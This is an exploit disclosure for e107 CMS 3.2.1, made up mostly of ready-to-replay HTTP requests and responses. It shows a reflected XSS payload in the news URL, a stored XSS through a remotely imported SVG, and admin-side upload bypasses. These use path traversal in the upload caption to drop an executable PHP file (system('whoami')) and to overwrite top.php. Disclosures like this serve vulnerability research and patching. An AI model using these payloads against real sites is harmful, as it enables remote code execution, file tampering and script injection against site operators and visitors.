e107 CMS v3.2.1 Exploit, Multiple Vulnerabilities

# Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities
# Date: 30/04/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 3.2.1
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Reflected - Via adding comment (Authenticated)

# POC
Request:
GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 08:02:42 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "71d7966eaa95fd8ac14da8baf3e0785d"
Content-Length: 25059
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]
<div class='media' >
<form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1'  >
[...]

User click to comment in news, writes any character in the comment field, and clicks elsewhere outside the comment field

image.png


### Upload restriction bypass (Authenticated [Admin]) + Stored Xss.

Account with administrative privileges can bypass upload image restriction (XSS Stored from .svg file)
image->media manager->upload a file->Image/File URL
admin can upload SVG from localhost ->http://127.0.0.1:8070/xxe_svg2.svg

# POC

Request:
POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img
Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption=

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 02:06:14 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "06ed5ef56b0f736995112cafd77e9ec0"
Content-Length: 20878
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]
<div class='well clearfix media-carousel-item-container'>
<a data-toggle='context' data-bs-toggle='context' class='e-media-select  '  data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg'  data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><span><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span>
</a>
[...]

image.png


### Upload restriction bypass (Authenticated [Admin])+RCE

Upload and execute .PHP file
Attacker must upload file to ../../../ to parent directory, due to fact that somehow application user can only execute PHP code when uploading to parent directory.

image.png


Media Manager-> Media Upload/Import -> From a remote location

# POC

Request
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:02:08 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]

We can see uploaded PHP file on the server side.

image.png


cmd.php file source:

<?php
system('whoami');
?>

image.png


### Upload restriction bypass (Authenticated [Admin])+ Server file override

Attacker can override example top.php file in the main directory of web application.
Original file top.php in server:
image.png


We can override file via following upload functionality:
Media Manager-> Media Upload/Import -> From a remote location

# POC

Request:
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:20:10 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]

top.php file content was tampered:

All rights reserved nPulse.net 2009 - 2022
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD